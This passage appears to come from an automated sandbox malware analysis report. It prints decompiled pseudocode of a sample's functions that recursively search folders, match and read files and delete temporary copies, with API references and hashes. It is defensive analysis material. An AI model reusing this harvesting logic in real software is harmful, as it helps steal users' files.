                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_t186);
                                                                                                                                                                        						L16:
                                                                                                                                                                        						L17:
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
                                                                                                                                                                        					_t189 = _t181 - _t125 >> 1;
                                                                                                                                                                        					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
                                                                                                                                                                        					__eflags = _t86;
                                                                                                                                                                        					if(_t86 == 0) {
                                                                                                                                                                        						L14:
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L16;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t17 = _t181 + 2; // 0x2
                                                                                                                                                                        					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
                                                                                                                                                                        					_t20 = _t189 + 1; // 0x1
                                                                                                                                                                        					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
                                                                                                                                                                        					__eflags = _t91;
                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
                                                                                                                                                                        					_v24 = _t94;
                                                                                                                                                                        					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
                                                                                                                                                                        					_t173 =  *0x40e1d0; // 0x6d5c38
                                                                                                                                                                        					_t97 = E0040A503(_t96, _t173);
                                                                                                                                                                        					_v44 = _t97;
                                                                                                                                                                        					_t98 = FindFirstFileW(_t97,  &_v640); // executed
                                                                                                                                                                        					_t127 = _t98;
                                                                                                                                                                        					_v40 = _t127;
                                                                                                                                                                        					__eflags = _t127 - 0xffffffff;
                                                                                                                                                                        					if(_t127 == 0xffffffff) {
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						__eflags = _v640.dwFileAttributes & 0x00000010;
                                                                                                                                                                        						if((_v640.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                        							__eflags = _v640.cFileName - 0x2e;
                                                                                                                                                                        							if(_v640.cFileName != 0x2e) {
                                                                                                                                                                        								_t103 =  *((intOrPtr*)( *0x40e18c))( &(_v640.cFileName), _v12);
                                                                                                                                                                        								__eflags = _t103;
                                                                                                                                                                        								if(_t103 != 0) {
                                                                                                                                                                        									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
                                                                                                                                                                        									_v32 = _t191;
                                                                                                                                                                        									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
                                                                                                                                                                        									_t35 = _t107 + 2; // 0x2
                                                                                                                                                                        									_t160 = _t35 - _t191;
                                                                                                                                                                        									__eflags = _t160;
                                                                                                                                                                        									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
                                                                                                                                                                        									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
                                                                                                                                                                        									_t39 = _t109 + 2; // 0x2
                                                                                                                                                                        									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        									_t192 = _v24;
                                                                                                                                                                        									_t111 = E0040A503(0, _t192);
                                                                                                                                                                        									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &(_v640.cFileName));
                                                                                                                                                                        									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
                                                                                                                                                                        									_t194 = _t194 + 0x10;
                                                                                                                                                                        									LocalFree(_t193);
                                                                                                                                                                        									LocalFree(_v32);
                                                                                                                                                                        									_t127 = _v40;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t101 = FindNextFileW(_t127,  &_v640); // executed
                                                                                                                                                                        						__eflags = _t101;
                                                                                                                                                                        					} while (_t101 != 0);
                                                                                                                                                                        					FindClose(_t127); // executed
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24);
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					_t123 = _v48 + 2;
                                                                                                                                                                        					__eflags = _t123;
                                                                                                                                                                        					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}














































                                                                                                                                                                        0x00403ca6
                                                                                                                                                                        0x00403caa
                                                                                                                                                                        0x00403cad
                                                                                                                                                                        0x00403f55
                                                                                                                                                                        0x00403f55
                                                                                                                                                                        0x00403f59
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403cbf
                                                                                                                                                                        0x00403cc3
                                                                                                                                                                        0x00403cd1
                                                                                                                                                                        0x00403cd5
                                                                                                                                                                        0x00403ce6
                                                                                                                                                                        0x00403cf0
                                                                                                                                                                        0x00403cfb
                                                                                                                                                                        0x00403d0a
                                                                                                                                                                        0x00403d1b
                                                                                                                                                                        0x00403d27
                                                                                                                                                                        0x00403d3b
                                                                                                                                                                        0x00403d3e
                                                                                                                                                                        0x00403d41
                                                                                                                                                                        0x00403d48
                                                                                                                                                                        0x00403d4a
                                                                                                                                                                        0x00403f7f
                                                                                                                                                                        0x00403f88
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403f97
                                                                                                                                                                        0x00403d6b
                                                                                                                                                                        0x00403d71
                                                                                                                                                                        0x00403d78
                                                                                                                                                                        0x00403d7f
                                                                                                                                                                        0x00403d81
                                                                                                                                                                        0x00403f65
                                                                                                                                                                        0x00403f68
                                                                                                                                                                        0x00403f71
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403d93
                                                                                                                                                                        0x00403d9b
                                                                                                                                                                        0x00403da6
                                                                                                                                                                        0x00403dac
                                                                                                                                                                        0x00403db3
                                                                                                                                                                        0x00403db5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403dc8
                                                                                                                                                                        0x00403dd7
                                                                                                                                                                        0x00403de4
                                                                                                                                                                        0x00403ded
                                                                                                                                                                        0x00403df2
                                                                                                                                                                        0x00403dfa
                                                                                                                                                                        0x00403e0d
                                                                                                                                                                        0x00403e10
                                                                                                                                                                        0x00403e12
                                                                                                                                                                        0x00403e14
                                                                                                                                                                        0x00403e17
                                                                                                                                                                        0x00403e1a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e20
                                                                                                                                                                        0x00403e27
                                                                                                                                                                        0x00403e2d
                                                                                                                                                                        0x00403e35
                                                                                                                                                                        0x00403e4a
                                                                                                                                                                        0x00403e4c
                                                                                                                                                                        0x00403e4e
                                                                                                                                                                        0x00403e60
                                                                                                                                                                        0x00403e74
                                                                                                                                                                        0x00403e7b
                                                                                                                                                                        0x00403e7e
                                                                                                                                                                        0x00403e82
                                                                                                                                                                        0x00403e89
                                                                                                                                                                        0x00403e89
                                                                                                                                                                        0x00403e8f
                                                                                                                                                                        0x00403e9a
                                                                                                                                                                        0x00403ea9
                                                                                                                                                                        0x00403eac
                                                                                                                                                                        0x00403eae
                                                                                                                                                                        0x00403eb5
                                                                                                                                                                        0x00403ed1
                                                                                                                                                                        0x00403eda
                                                                                                                                                                        0x00403edf
                                                                                                                                                                        0x00403ee3
                                                                                                                                                                        0x00403eec
                                                                                                                                                                        0x00403ef2
                                                                                                                                                                        0x00403ef2
                                                                                                                                                                        0x00403e4e
                                                                                                                                                                        0x00403e35
                                                                                                                                                                        0x00403f02
                                                                                                                                                                        0x00403f04
                                                                                                                                                                        0x00403f04
                                                                                                                                                                        0x00403f0d
                                                                                                                                                                        0x00403f16
                                                                                                                                                                        0x00403f1f
                                                                                                                                                                        0x00403f28
                                                                                                                                                                        0x00403f31
                                                                                                                                                                        0x00403f3a
                                                                                                                                                                        0x00403f4f
                                                                                                                                                                        0x00403f4f
                                                                                                                                                                        0x00403f53
                                                                                                                                                                        0x00403f53
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID: 8\m
                                                                                                                                                                        • API String ID: 3494564517-4029964935
                                                                                                                                                                        • Opcode ID: 1bb4ae642edddd975e73f152ff3b11f606833d84a600c2f2473e6c48155b5260
                                                                                                                                                                        • Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
                                                                                                                                                                        • Opcode Fuzzy Hash: 1bb4ae642edddd975e73f152ff3b11f606833d84a600c2f2473e6c48155b5260
                                                                                                                                                                        • Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                        				char _v568;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                        				intOrPtr _v628;
                                                                                                                                                                        				void* _v632;
                                                                                                                                                                        				void* _v640;
                                                                                                                                                                        				intOrPtr _v664;
                                                                                                                                                                        				char _v668;
                                                                                                                                                                        				intOrPtr _v688;
                                                                                                                                                                        				void* _v696;
                                                                                                                                                                        				intOrPtr _v700;
                                                                                                                                                                        				void* _v704;
                                                                                                                                                                        				void* _v712;
                                                                                                                                                                        				void* _v716;
                                                                                                                                                                        				void* _v720;
                                                                                                                                                                        				char _v736;
                                                                                                                                                                        				intOrPtr _v748;
                                                                                                                                                                        				intOrPtr _v760;
                                                                                                                                                                        				void* _v768;
                                                                                                                                                                        				intOrPtr _v776;
                                                                                                                                                                        				signed int _v784;
                                                                                                                                                                        				void* _v788;
                                                                                                                                                                        				void* _v792;
                                                                                                                                                                        				void* _v796;
                                                                                                                                                                        				intOrPtr _v800;
                                                                                                                                                                        				void* _v804;
                                                                                                                                                                        				void* _v820;
                                                                                                                                                                        				void* _v828;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				char _t69;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				void* _t153;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				void* _t159;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				void* _t168;
                                                                                                                                                                        
                                                                                                                                                                        				_t168 = (_t166 & 0xfffffff8) - 0x284;
                                                                                                                                                                        				_v628 = __edx;
                                                                                                                                                                        				_t160 = __ecx;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
                                                                                                                                                                        				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
                                                                                                                                                                        				_v632 = _t113;
                                                                                                                                                                        				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
                                                                                                                                                                        				_t66 = FindFirstFileW(_t113,  &_v616); // executed
                                                                                                                                                                        				_t154 = _t66;
                                                                                                                                                                        				_v640 = _t154;
                                                                                                                                                                        				if(_t154 != 0xffffffff) {
                                                                                                                                                                        					_t114 = _t160;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if((_v616.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                        							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &(_v616.dwReserved1));
                                                                                                                                                                        							_v668 = _t69;
                                                                                                                                                                        							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
                                                                                                                                                                        							_v700 = _t72;
                                                                                                                                                                        							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        							_v700 = _t73;
                                                                                                                                                                        							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
                                                                                                                                                                        							_t161 = _v696;
                                                                                                                                                                        							if(E0040A2AA(_t161 + _t74 * 2,  &_v704, _v688) != 0) {
                                                                                                                                                                        								_t76 = E0040A503(_v712, _v704);
                                                                                                                                                                        								_v712 = _t76;
                                                                                                                                                                        								_v716 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        								if(E0040A69E( *0x40e044,  &_v716) != 0) {
                                                                                                                                                                        									_t164 = _v716;
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_push(_t164);
                                                                                                                                                                        									_push(_v704);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e184))() != 0) {
                                                                                                                                                                        										_v748 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v760, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        										_v768 = 0;
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
                                                                                                                                                                        										_t151 = _v776;
                                                                                                                                                                        										_v796 = 0;
                                                                                                                                                                        										if(_t151 != 0) {
                                                                                                                                                                        											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v800, 0xffffffff, 0, _t151, 0, 0);
                                                                                                                                                                        											if(0 == 0 || E0040A70E( &_v736, _a8) == 0) {
                                                                                                                                                                        												LocalFree(_v828);
                                                                                                                                                                        												CloseHandle(_v820);
                                                                                                                                                                        												DeleteFileW(_t164);
                                                                                                                                                                        												LocalFree(_t164);
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t139 = _a20;
                                                                                                                                                                        												_v784 = _v784 & 0x00000000;
                                                                                                                                                                        												_v796 = _v828;
                                                                                                                                                                        												_v792 = _v820;
                                                                                                                                                                        												_v788 = _t164;
                                                                                                                                                                        												 *_t139 =  *_a20 + 1;
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                        												_t154 = _v804;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v704);
                                                                                                                                                                        							} else {
                                                                                                                                                                        								LocalFree(_t161);
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v720);
                                                                                                                                                                        							LocalFree(_v712);
                                                                                                                                                                        							L18:
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v568 != 0x2e && E0040A70E( &_v568, _a12) == 0) {
                                                                                                                                                                        							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &(_v616.dwReserved1));
                                                                                                                                                                        							E004052DA(_t163, _v664, _a4, _a8, _a12, _a16, _a20);
                                                                                                                                                                        							_t168 = _t168 + 0x14;
                                                                                                                                                                        							LocalFree(_t163);
                                                                                                                                                                        							goto L18;
                                                                                                                                                                        						}
                                                                                                                                                                        						L19:
                                                                                                                                                                        						_push( &_v668);
                                                                                                                                                                        						_push(_t154);
                                                                                                                                                                        					} while ( *((intOrPtr*)( *0x40e148))() != 0);
                                                                                                                                                                        					LocalFree(_v696);
                                                                                                                                                                        					FindClose(_t154);
                                                                                                                                                                        					goto L21;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_t113);
                                                                                                                                                                        					L21:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        			}























































                                                                                                                                                                        0x004052e0
                                                                                                                                                                        0x004052f5
                                                                                                                                                                        0x004052f9
                                                                                                                                                                        0x004052fb
                                                                                                                                                                        0x0040530d
                                                                                                                                                                        0x00405316
                                                                                                                                                                        0x0040531a
                                                                                                                                                                        0x0040532b
                                                                                                                                                                        0x0040532d
                                                                                                                                                                        0x0040532f
                                                                                                                                                                        0x00405336
                                                                                                                                                                        0x00405344
                                                                                                                                                                        0x00405346
                                                                                                                                                                        0x0040534b
                                                                                                                                                                        0x004053bb
                                                                                                                                                                        0x004053ca
                                                                                                                                                                        0x004053d9
                                                                                                                                                                        0x004053dd
                                                                                                                                                                        0x004053f3
                                                                                                                                                                        0x00405405
                                                                                                                                                                        0x00405409
                                                                                                                                                                        0x00405417
                                                                                                                                                                        0x0040541b
                                                                                                                                                                        0x0040541d
                                                                                                                                                                        0x00405430
                                                                                                                                                                        0x00405440
                                                                                                                                                                        0x00405452
                                                                                                                                                                        0x0040545c
                                                                                                                                                                        0x00405467
                                                                                                                                                                        0x0040546d
                                                                                                                                                                        0x00405476
                                                                                                                                                                        0x00405478
                                                                                                                                                                        0x00405479
                                                                                                                                                                        0x00405481
                                                                                                                                                                        0x004054a3
                                                                                                                                                                        0x004054b9
                                                                                                                                                                        0x004054c8
                                                                                                                                                                        0x004054cc
                                                                                                                                                                        0x004054ce
                                                                                                                                                                        0x004054d2
                                                                                                                                                                        0x004054d8
                                                                                                                                                                        0x004054f7
                                                                                                                                                                        0x004054fb
                                                                                                                                                                        0x00405549
                                                                                                                                                                        0x00405554
                                                                                                                                                                        0x0040555b
                                                                                                                                                                        0x00405562
                                                                                                                                                                        0x0040550d
                                                                                                                                                                        0x0040550d
                                                                                                                                                                        0x00405514
                                                                                                                                                                        0x00405519
                                                                                                                                                                        0x00405521
                                                                                                                                                                        0x00405530
                                                                                                                                                                        0x00405538
                                                                                                                                                                        0x0040553a
                                                                                                                                                                        0x0040553b
                                                                                                                                                                        0x0040553c
                                                                                                                                                                        0x0040553d
                                                                                                                                                                        0x0040553e
                                                                                                                                                                        0x0040553e
                                                                                                                                                                        0x004054fb
                                                                                                                                                                        0x004054d8
                                                                                                                                                                        0x00405481
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x00405432
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x0040556c
                                                                                                                                                                        0x00405576
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405353
                                                                                                                                                                        0x00405379
                                                                                                                                                                        0x00405391
                                                                                                                                                                        0x004053a1
                                                                                                                                                                        0x004053a6
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405580
                                                                                                                                                                        0x00405586
                                                                                                                                                                        0x0040558f
                                                                                                                                                                        0x00405590
                                                                                                                                                                        0x00405593
                                                                                                                                                                        0x004055a0
                                                                                                                                                                        0x004055a7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405338
                                                                                                                                                                        0x00405339
                                                                                                                                                                        0x004055ad
                                                                                                                                                                        0x004055b5
                                                                                                                                                                        0x004055b5

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 0040532B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00405339
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405580
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004055A0
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004055A7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$Find$CloseFileFirst
                                                                                                                                                                        • String ID: .
                                                                                                                                                                        • API String ID: 422121646-248832578
                                                                                                                                                                        • Opcode ID: 8c6a5511dc8fc088a2e42269fb89b557bfc65514d3feaa707af3d02d29105364
                                                                                                                                                                        • Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c6a5511dc8fc088a2e42269fb89b557bfc65514d3feaa707af3d02d29105364
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5
                                                                                                                                                                          • Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
                                                                                                                                                                          • Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1
                                                                                                                                                                        • wsprintfW.USER32 ref: 004093E3
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$lstrcpyn$Alloclstrlen$ByteCharGlobalInfoMultiSystemWidewsprintf
                                                                                                                                                                        • String ID: n
                                                                                                                                                                        • API String ID: 1885324996-2013832146
                                                                                                                                                                        • Opcode ID: 88facd3d2ccba2b791435520d18aea57aba3ddc4eac04c95bc4be645a3463a6d
                                                                                                                                                                        • Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
                                                                                                                                                                        • Opcode Fuzzy Hash: 88facd3d2ccba2b791435520d18aea57aba3ddc4eac04c95bc4be645a3463a6d
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                        			E00401B05(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                        				char _v1126;
                                                                                                                                                                        				short _v1128;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				int _t33;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				WCHAR* _t80;
                                                                                                                                                                        				void* _t81;
                                                                                                                                                                        				WCHAR* _t83;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t80 = __ecx;
                                                                                                                                                                        				if(_a12 > 2) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				E004018E9( &_v1128, 0x104, __ecx, __ecx);
                                                                                                                                                                        				E0040188C(0x104,  &_v1128, 0x104, _t81,  *0x40e1d0);
                                                                                                                                                                        				_t32 = FindFirstFileW( &_v1128,  &_v608); // executed
                                                                                                                                                                        				_t60 = _t32;
                                                                                                                                                                        				if(_t60 != 0xffffffff) {
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( *0x40e1dc);
                                                                                                                                                                        					_push( &(_v608.cFileName));
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e0a0))() != 0) {
                                                                                                                                                                        						_push( *0x40e1ac);
                                                                                                                                                                        						_push( &(_v608.cFileName));
                                                                                                                                                                        						if(lstrlenW( *((intOrPtr*)( *0x40e18c))()) <= 0) {
                                                                                                                                                                        							_t39 = 0x2e;
                                                                                                                                                                        							if(_t39 != _v608.cFileName) {
                                                                                                                                                                        								_t41 =  *((intOrPtr*)( *0x40e08c))(_t80);
                                                                                                                                                                        								_t70 =  &_v1126 + _t41 * 2;
                                                                                                                                                                        								_push( &_v1126 + _t41 * 2);
                                                                                                                                                                        								E004018E9( &_v1126 + _t41 * 2, 0x104, _t70,  &(_v608.cFileName));
                                                                                                                                                                        								_t25 =  &_a8; // 0x407b38
                                                                                                                                                                        								E00401B05( &_v1128, _v12, _a4,  *_t25, _a12 + 1); // executed
                                                                                                                                                                        								_t84 = _t84 + 0xc;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L12;
